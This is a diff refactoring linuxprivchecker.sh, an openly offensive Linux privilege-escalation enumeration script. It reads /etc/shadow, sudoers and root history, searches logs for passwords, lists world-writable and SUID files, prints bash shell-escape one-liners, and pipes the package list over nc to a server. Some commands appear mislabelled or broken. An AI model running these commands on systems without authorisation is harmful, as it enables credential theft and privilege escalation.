| skipped 1 lines |
2 | 2 | | |
3 | 3 | | ############################################################################################################### |
4 | 4 | | ## [Title]: linuxprivchecker.sh -- a Linux Privilege Escalation Check Script |
5 | | - | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift |
6 | | - | ## [Contributors]: Mike Merrill (linted) -- https://github.com/linted |
7 | | - | ## James Hogan (5aru) -- https://github.com/5aru |
| 5 | + | ## [Original Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift |
| 6 | + | ## Forked from linuxprivchecker.py -- https://github.com/sleventyeleven/linuxprivchecker |
| 7 | + | ## [Contributors]: |
| 8 | + | ## Mike Merrill (linted) -- https://github.com/linted |
| 9 | + | ## James Hogan (5aru) -- https://github.com/5aru |
| 10 | + | ## Ali Kaba (alibkaba) -- https://github.com/alibkaba |
8 | 11 | | ##------------------------------------------------------------------------------------------------------------- |
9 | 12 | | ## [Details]: |
10 | | - | ## Similar functions to Mike Czumak's linuxprivchecker.py Linux Privilege Escalation Check Script. |
11 | 13 | | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and |
12 | 14 | | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text |
13 | 15 | | ## passwords and applicable exploits. |
| skipped 17 lines |
31 | 33 | | ## USE OR OTHER DEALINGS IN THE SOFTWARE. |
32 | 34 | | ############################################################################################################### |
33 | 35 | | |
34 | | - | ### Useful functions |
35 | | - | |
| 36 | + | # command paths |
36 | 37 | | PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" |
37 | 38 | | |
38 | | - | TITLE_LINE=$(printf "%*s\n" "80" | tr ' ' "=") |
39 | | - | SECTION_LINE=$(printf "%*s\n" "80" | tr ' ' "-") |
| 39 | + | # fonts formatting |
| 40 | + | RESET='\e[0m'; # No Color |
| 41 | + | RED='\e[31m'; |
| 42 | + | LRED='\e[91m'; |
| 43 | + | GREEN='\e[32m'; |
| 44 | + | LGREEN='\e[92m'; |
| 45 | + | LYELLOW='\e[93m'; |
| 46 | + | LCYAN='\e[96m'; |
| 47 | + | BLINK='\e[5m'; |
| 48 | + | BOLD='\e[1m'; |
40 | 49 | | |
41 | | - | function formatCommand(){ |
42 | | - | eval $1 | sed 's|^| |' |
| 50 | + | # line formatting |
| 51 | + | titleLINE=$(printf "${LGREEN}%*s\n" "70" | tr ' ' "="); |
| 52 | + | sectionLINE=$(printf "${LGREEN}%*s\n" "40" | tr ' ' "-"); |
| 53 | + | |
| 54 | + | # title |
| 55 | + | scriptTITLE(){ |
| 56 | + | echo ${titleLINE}; |
| 57 | + | echo "LINUX PRIVILEGE ESCALATION CHECKER" |
| 58 | + | echo "Go to https://github.com/linted/linuxprivchecker for more info..." |
| 59 | + | echo -e ${titleLINE}${RESET}; |
43 | 60 | | } |
44 | 61 | | |
45 | | - | echo ${TITLE_LINE} |
46 | | - | echo "LINUX_PRIVILEGE ESCALATION CHECKER" |
47 | | - | echo ${TITLE_LINE} |
| 62 | + | systemAREAtitle(){ |
| 63 | + | echo ${sectionLINE}; |
| 64 | + | echo "[*] $systemAREA..."; |
| 65 | + | echo -e ${sectionLINE}${RESET}; |
| 66 | + | printf "\n"; |
| 67 | + | sleep .5s; |
| 68 | + | } |
48 | 69 | | |
49 | | - | echo -e "\n[*] GETTING BASIC SYSTEM INFO...\n" |
| 70 | + | cmdRESPONSE(){ |
| 71 | + | # run and format cmd |
| 72 | + | cmdRESULT=$(eval $1 2>/dev/null | sed 's|^| |'; echo "${PIPESTATUS[0]}"); |
50 | 73 | | |
51 | | - | echo "[+] Operating System" |
52 | | - | formatCommand "cat /etc/issue" |
| 74 | + | # check cmd status |
| 75 | + | if [ ${cmdRESULT:(-1)} -eq 0 ]; then |
| 76 | + | echo -e "${LGREEN}[+] $systemNAME"; |
| 77 | + | printf "${GREEN}${cmdRESULT%?}\n${RESET}"; |
| 78 | + | else |
| 79 | + | echo -e "${LRED}[!] $systemNAME"; |
| 80 | + | printf "${LYELLOW}${cmdRESULT%?}\n${RESET}"; |
| 81 | + | fi |
| 82 | + | sleep .5s; |
| 83 | + | } |
53 | 84 | | |
54 | | - | echo -e "\n[+] Kernel" |
55 | | - | formatCommand "cat /proc/version" |
| 85 | + | operatingSYSTEM(){ |
| 86 | + | systemAREA="OPERATING SYSTEM"; |
| 87 | + | systemAREAtitle; |
56 | 88 | | |
57 | | - | echo -e "\n[+] Hostname/FQDN" |
58 | | - | formatCommand "hostname -f" |
59 | | - | |
60 | | - | echo -ne "\n${SECTION_LINE}\n" |
61 | | - | echo -e "[*] GETTING NETWORKING INFO...\n" |
62 | | - | |
63 | | - | echo "[+] Route" |
64 | | - | |
65 | | - | if [ -x "$(command -v route)" ]; then |
66 | | - | formatCommand "route -n" |
67 | | - | else |
68 | | - | formatCommand "ip route" |
69 | | - | fi |
70 | | - | |
71 | | - | echo -e "\n[+] Interfaces" |
72 | | - | |
73 | | - | if [ -x "$(command -v ifconfig)" ]; then |
74 | | - | formatCommand "ifconfig -a" |
75 | | - | else |
76 | | - | formatCommand "ip addr show" |
77 | | - | fi |
| 89 | + | systemNAME="Distribution"; |
| 90 | + | cmdRESPONSE "cat /etc/*-release"; |
78 | 91 | | |
79 | | - | echo -e "\n[+] Network Connections" |
| 92 | + | systemNAME="Kernel"; |
| 93 | + | cmdRESPONSE "if [ -f /proc/version ]; then cat /proc/version; else uname -a; fi"; |
80 | 94 | | |
81 | | - | if [ -x "$(command -v netstat)" ]; then |
82 | | - | formatCommand "netstat -tupan | grep -v TIME_WAIT" |
83 | | - | else |
84 | | - | formatCommand "ss -tupan | grep -v CLOSE_WAIT" |
85 | | - | fi |
| 95 | + | systemNAME="Hostname"; |
| 96 | + | cmdRESPONSE "hostname -f"; |
| 97 | + | } |
86 | 98 | | |
87 | | - | echo -ne "\n${SECTION_LINE}\n" |
88 | | - | echo -e "[*] GETTING FILESYSTEM INFO...\n" |
| 99 | + | netWORK(){ |
| 100 | + | systemAREA="NETWORK"; |
| 101 | + | systemAREAtitle; |
89 | 102 | | |
90 | | - | echo -e "\n[+] Mount Results" |
91 | | - | formatCommand "mount" |
| 103 | + | systemNAME="Network Interfaces"; |
| 104 | + | cmdRESPONSE "ifconfig || ip a"; |
92 | 105 | | |
93 | | - | echo -e "\n[+] fstab Entries" |
94 | | - | formatCommand "cat /etc/fstab 2>/dev/null" |
| 106 | + | systemNAME="DNS Resolver"; |
| 107 | + | cmdRESPONSE "cat /etc/resolv.conf"; |
95 | 108 | | |
96 | | - | echo -e "\n[+] Scheduled cron jobs" |
97 | | - | formatCommand "ls -al /etc/cron* 2>/dev/null" |
| 109 | + | systemNAME="Route"; |
| 110 | + | cmdRESPONSE "route -n || ip route"; |
| 111 | + | } |
98 | 112 | | |
99 | | - | echo -e "\n[+] Writable cron directories" |
100 | | - | formatCommand "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$' 2>/dev/null" |
| 113 | + | userENVIRONMENT(){ |
| 114 | + | systemAREA="USERS & ENVIRONMENT"; |
| 115 | + | systemAREAtitle; |
101 | 116 | | |
102 | | - | echo -ne "\n${SECTION_LINE}\n" |
103 | | - | echo -e "[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" |
104 | | - | echo -e "\n[+] Current User" |
105 | | - | formatCommand "whoami" |
| 117 | + | systemNAME="Current User"; |
| 118 | + | cmdRESPONSE "whoami"; |
106 | 119 | | |
107 | | - | echo -e "\n[+] Current User ID" |
108 | | - | formatCommand "id" |
| 120 | + | systemNAME="Current User ID"; |
| 121 | + | cmdRESPONSE "id"; |
109 | 122 | | |
110 | | - | echo -e "\n[+] All users" |
111 | | - | formatCommand "cat /etc/passwd" |
| 123 | + | systemNAME="Who's Logged Right Now"; |
| 124 | + | cmdRESPONSE "w"; |
112 | 125 | | |
113 | | - | echo -e "\n[+] Super Users Found" |
114 | | - | formatCommand "grep -v -E '^#' /etc/passwd | awk -F: '\$3 == 0{print \$1}'" |
| 126 | + | systemNAME="Who's Logged Last"; |
| 127 | + | cmdRESPONSE "last"; |
115 | 128 | | |
116 | | - | echo -e "\n[+] Root and current user history (depends on privs)" |
117 | | - | formatCommand "ls -al ~/.*_history; ls -la /root/.*_history 2>/dev/null" |
| 129 | + | systemNAME="All Users"; |
| 130 | + | cmdRESPONSE "cat /etc/passwd"; |
118 | 131 | | |
119 | | - | echo -e "\n[+] Environment Variables" |
120 | | - | formatCommand "env 2>/dev/null | grep -v 'LS_COLORS'" |
| 132 | + | systemNAME="All Groups"; |
| 133 | + | cmdRESPONSE "cat /etc/group"; |
121 | 134 | | |
122 | | - | echo -e "\n[+] Sudoers (Privileged) [/etc/sudoers]" |
123 | | - | formatCommand "cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null" |
| 135 | + | systemNAME="Shadow File"; |
| 136 | + | cmdRESPONSE "cat /etc/shadow"; |
124 | 137 | | |
125 | | - | echo -e "\n[+] Sudoers Files (Privileged) [/etc/sudoers.d/*]" |
126 | | - | formatCommand "cat /etc/sudoers.d/* 2>/dev/null | grep -v '#' 2>/dev/null" |
| 138 | + | systemNAME="Super Users"; |
| 139 | + | cmdRESPONSE "grep -v -E '^#' /etc/passwd | awk -F: '(/$3 == 0) { print /$1 }'"; |
127 | 140 | | |
128 | | - | echo -e "\n[+] Logged in User Activity" |
129 | | - | formatCommand "w 2>/dev/null" |
| 141 | + | systemNAME="Sudo Users"; |
| 142 | + | cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; |
130 | 143 | | |
131 | | - | echo -ne "\n${SECTION_LINE}\n" |
132 | | - | echo -e "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" |
| 144 | + | systemNAME="Sudoers (Privileged) [/etc/sudoers]"; |
| 145 | + | cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; |
133 | 146 | | |
134 | | - | echo -e "\n[+] World Writable Directories for User/Group 'root'" |
135 | | - | formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root" |
| 147 | + | systemNAME="Sudoers Files (Privileged) [/etc/sudoers.d/*]"; |
| 148 | + | cmdRESPONSE "cat /etc/sudoers.d/* | grep -v '#'"; |
136 | 149 | | |
137 | | - | echo -e "\n[+] World Writable Directories for User other than 'root'" |
138 | | - | formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null" |
| 150 | + | systemNAME="Root and Current User History (depends on privs)"; |
| 151 | + | cmdRESPONSE "ls -al ~/.*_history 2>/dev/null; ls -la /root/.*_history"; |
139 | 152 | | |
140 | | - | echo -e "\n[+] World Writable Files" |
141 | | - | formatCommand "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';' 2>/dev/null" |
| 153 | + | systemNAME="Environment Variables"; |
| 154 | + | cmdRESPONSE "env | grep -v "LS_COLORS""; |
142 | 155 | | |
143 | | - | echo -e "\n[+] SUID/GUID Files and Directories" |
144 | | - | formatCommand "find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null" |
| 156 | + | systemNAME="Printer"; |
| 157 | + | cmdRESPONSE "lpstat -a"; |
| 158 | + | } |
145 | 159 | | |
146 | | - | echo -e "\n[+] Checking if root's home folder is accessible" |
147 | | - | formatCommand "ls -ahlR /root 2>/dev/null" |
| 160 | + | filePERMISSIONS(){ |
| 161 | + | systemAREA="FILE SYSTEMS & PERMISSIONS"; |
| 162 | + | systemAREAtitle; |
148 | 163 | | |
149 | | - | echo -e "\n[+] Logs containing keyword 'password'" |
150 | | - | formatCommand "find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null" |
| 164 | + | systemNAME="Mounts"; |
| 165 | + | cmdRESPONSE "mount"; |
151 | 166 | | |
152 | | - | echo -e "\n[+] Config files containing keyword 'password'" |
153 | | - | formatCommand "find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null" |
| 167 | + | systemNAME="fstab Entries"; |
| 168 | + | cmdRESPONSE "cat /etc/fstab"; |
154 | 169 | | |
155 | | - | echo -e "\n[+] Shadow Files (Privileged)" |
156 | | - | formatCommand "cat /etc/shadow 2>/dev/null" |
| 170 | + | systemNAME="Scheduled Cron Jobs"; |
| 171 | + | cmdRESPONSE "ls -al /etc/cron*"; |
157 | 172 | | |
158 | | - | echo -ne "\n${SECTION_LINE}\n" |
159 | | - | echo -e "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" |
| 173 | + | systemNAME="Writable Cron Directories"; |
| 174 | + | cmdRESPONSE "ls -aRl /etc/cron* | awk '/$1 ~ /w.$'"; |
160 | 175 | | |
161 | | - | echo -e "[+] Installed Packages" |
162 | | - | if [ -x "$(command -v dpkg)" ]; then |
163 | | - | PKGMNGR=1 |
164 | | - | formatCommand "dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'" |
165 | | - | elif [ -x "$(command -v dnf)" ]; then |
166 | | - | PKGMNGR=2 |
167 | | - | formatCommand "dnf -qa | sort -u" |
168 | | - | elif [ -x "$(command -v rpm)" ]; then |
169 | | - | PKGMNGR=3 |
170 | | - | formatCommand "rpm -qa | sort -u" |
171 | | - | fi |
| 176 | + | systemNAME="Root Home Folder Accessibility"; |
| 177 | + | cmdRESPONSE "ls -lt /root/"; |
172 | 178 | | |
173 | | - | echo -e "\n[+] Current Processes" |
174 | | - | formatCommand "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'" |
| 179 | + | systemNAME="World Writeables Directories for User/Group 'root'"; |
| 180 | + | cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -o+w \) -exec ls -ld '{}' ';' | grep root"; |
175 | 181 | | |
176 | | - | echo -e "\n[+] Sudo Version" |
177 | | - | formatCommand "sudo -V | grep version 2>/dev/null" |
| 182 | + | systemNAME="World Writeables Directories for non-root Users"; |
| 183 | + | cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' | grep -v root "; |
178 | 184 | | |
179 | | - | echo -e "\n[+] Apache Version and Modules" |
180 | | - | formatCommand "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l 2>/dev/null" |
| 185 | + | systemNAME="World Writeables Files"; |
| 186 | + | cmdRESPONSE "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';'"; |
181 | 187 | | |
182 | | - | echo -e "\n[+] Apache Config File" |
183 | | - | formatCommand "cat /etc/apache2/apache2.conf 2>/dev/null" |
| 188 | + | systemNAME="SUID/GUID Files and Directories"; |
| 189 | + | cmdRESPONSE "ls -ahlR /root"; |
184 | 190 | | |
185 | | - | echo -ne "\n${SECTION_LINE}\n" |
186 | | - | echo -e "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" |
| 191 | + | systemNAME="Configuration Files Containing Keyword 'password'"; |
| 192 | + | cmdRESPONSE "find /var/log -name '*.log' | xargs -l10 egrep 'pwd|password' 2>/dev/null"; |
| 193 | + | } |
187 | 194 | | |
188 | | - | EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))" |
| 195 | + | applicationSERVICES(){ |
| 196 | + | systemAREA="APPLICATIONS & SERVICES"; |
| 197 | + | systemAREAtitle; |
189 | 198 | | |
190 | | - | if [ $PKGMNGR -eq 1 ]; then |
191 | | - | formatCommand "dpkg -l | grep -iE '${EXTDGREP}'" |
192 | | - | elif [ $PKGMNGR -eq 2 ]; then |
193 | | - | formatCommand "dnf -qa | grep -iE '${EXTDGREP}'" |
194 | | - | elif [ $PKGMNGR -eq 3 ]; then |
195 | | - | formatCommand "rpm -qa | grep -iE '${EXTDGREP}'" |
196 | | - | fi |
| 199 | + | systemNAME="Installed Packages"; |
| 200 | + | cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | sort -u; elif [ -x "$(command -v rpm)" ]; then rpm -qa | sort -u; fi"; |
197 | 201 | | |
198 | | - | echo -ne "\n${SECTION_LINE}\n" |
199 | | - | echo -e "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING..." |
| 202 | + | systemNAME="Current Running Services"; |
| 203 | + | cmdRESPONSE "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'"; |
200 | 204 | | |
201 | | - | echo -e "\n[+] Installed Tools" |
202 | | - | formatCommand "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null" |
| 205 | + | systemNAME="Sudo version"; |
| 206 | + | cmdRESPONSE "sudo -V | grep version"; |
203 | 207 | | |
204 | | - | echo -e "\n[+] Related Shell Escape Sequences" |
205 | | - | if [ -x "$(command -v vi)" ]; then |
206 | | - | formatCommand "echo -ne \"vi-->\t:!bash\n\"" |
207 | | - | formatCommand "echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"" |
208 | | - | fi |
| 208 | + | systemNAME="Apache Version and Modules"; |
| 209 | + | cmdRESPONSE "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l"; |
209 | 210 | | |
210 | | - | if [ -x "$(command -v vim)" ]; then |
211 | | - | echo -ne "vim-->\t:!bash\n" | sed 's|^| |' |
212 | | - | echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |' |
213 | | - | fi |
| 211 | + | systemNAME="Apache Config File"; |
| 212 | + | cmdRESPONSE "cat /etc/apache2/apache2.conf"; |
214 | 213 | | |
215 | | - | if [ -x "$(command -v awk)" ]; then |
216 | | - | echo -ne "awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n" | sed 's|^| |' |
217 | | - | fi |
| 214 | + | systemNAME="Processes and Packages Running as Root or other Superuser"; |
| 215 | + | EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))"; |
| 216 | + | cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v rpm)" ]; then rpm -qa | grep -iE '${EXTDGREP}'; fi"; |
218 | 217 | | |
219 | | - | if [ -x "$(command -v perl)" ]; then |
220 | | - | echo -ne "perl-->\tperl -e 'exec \"/bin/bash\";'\n" | sed 's|^| |' |
221 | | - | fi |
| 218 | + | systemNAME="Installed Tools"; |
| 219 | + | cmdRESPONSE "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp"; |
222 | 220 | | |
223 | | - | if [ -x "$(command -v python)" ]; then |
224 | | - | echo -ne "python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n" | sed 's|^| |' |
225 | | - | fi |
| 221 | + | systemNAME="Related Shell Escape Sequences"; |
| 222 | + | cmdRESPONSE "if [ -x "$(command -v vi)" ]; then echo -ne \"vi-->\t:!bash\n\"; echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"; fi"; |
| 223 | + | cmdRESPONSE "if [ -x "$(command -v vim)" ]; then echo -ne \"vim-->\t:!bash\n\" | sed 's|^| |'; echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |'; fi"; |
| 224 | + | cmdRESPONSE "if [ -x "$(command -v awk)" ]; then echo -ne \"awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n\" | sed 's|^| |'; fi"; |
| 225 | + | cmdRESPONSE "if [ -x "$(command -v perl)" ]; then echo -ne \"perl-->\tperl -e 'exec \"/bin/bash\";'\n\" | sed 's|^| |'; fi"; |
| 226 | + | cmdRESPONSE "if [ -x "$(command -v python)" ]; then echo -ne \"python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n\" | sed 's|^| |'; fi"; |
| 227 | + | cmdRESPONSE "if [ -x "$(command -v find)" ]; then echo -ne \"find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n\" | sed 's|^| |'; fi"; |
| 228 | + | cmdRESPONSE "if [ -x "$(command -v nmap)" ]; then echo -ne \"nmap-->\t--interactive\n\" | sed 's|^| |'; fi"; |
| 229 | + | } |
226 | 230 | | |
227 | | - | if [ -x "$(command -v find)" ]; then |
228 | | - | echo -ne "find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n" | sed 's|^| |' |
229 | | - | fi |
| 231 | + | searchEXPLOITS(){ |
| 232 | + | systemAREA="Search for Exploits"; |
| 233 | + | systemAREAtitle; |
230 | 234 | | |
231 | | - | if [ -x "$(command -v nmap)" ]; then |
232 | | - | echo -ne "nmap-->\t--interactive\n" | sed 's|^| |' |
233 | | - | fi |
| 235 | + | echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." |
| 236 | + | read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer |
234 | 237 | | |
235 | | - | echo -ne "\n${SECTION_LINE}\n" |
236 | | - | echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." |
237 | | - | read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer |
| 238 | + | if [[ $connectToServer = y* ]] |
| 239 | + | then |
| 240 | + | read -p "[?] What is the address of the server? " server |
| 241 | + | read -p "[?] What port is the server using? " port |
| 242 | + | echo -ne "\n\n" |
| 243 | + | echo -e "[ ] Searching on $server:$port" |
| 244 | + | printf "%*s\n" "80" | tr " " "*" |
| 245 | + | dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port |
| 246 | + | printf "%*s\n" "80" | tr " " "*" |
| 247 | + | fi |
| 248 | + | } |
238 | 249 | | |
239 | | - | if [[ $connectToServer = y* ]] |
240 | | - | then |
241 | | - | read -p "[?] What is the address of the server? " server |
242 | | - | read -p "[?] What port is the server using? " port |
243 | | - | echo -ne "\n\n" |
244 | | - | echo -e "[ ] Searching on $server:$port" |
245 | | - | printf "%*s\n" "80" | tr " " "*" |
246 | | - | dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port |
247 | | - | printf "%*s\n" "80" | tr " " "*" |
248 | | - | fi |
| 250 | + | start(){ |
| 251 | + | scriptTITLE; |
| 252 | + | operatingSYSTEM; |
| 253 | + | netWORK; |
| 254 | + | userENVIRONMENT; |
| 255 | + | filePERMISSIONS; |
| 256 | + | applicationSERVICES; |
| 257 | + | searchEXPLOITS; |
| 258 | + | echo ${titleLINE}; |
| 259 | + | echo "FINISHED" |
| 260 | + | echo -e ${titleLINE}${RESET}; |
| 261 | + | echo -e $RESET; |
| 262 | + | } |
249 | 263 | | |
250 | | - | echo -ne "\n\n${TITLE_LINE}" |
251 | | - | echo -ne "\nFINISHED" |
252 | | - | echo -ne "\n${TITLE_LINE}\n" |
| 264 | + | start; |
253 | 265 | | |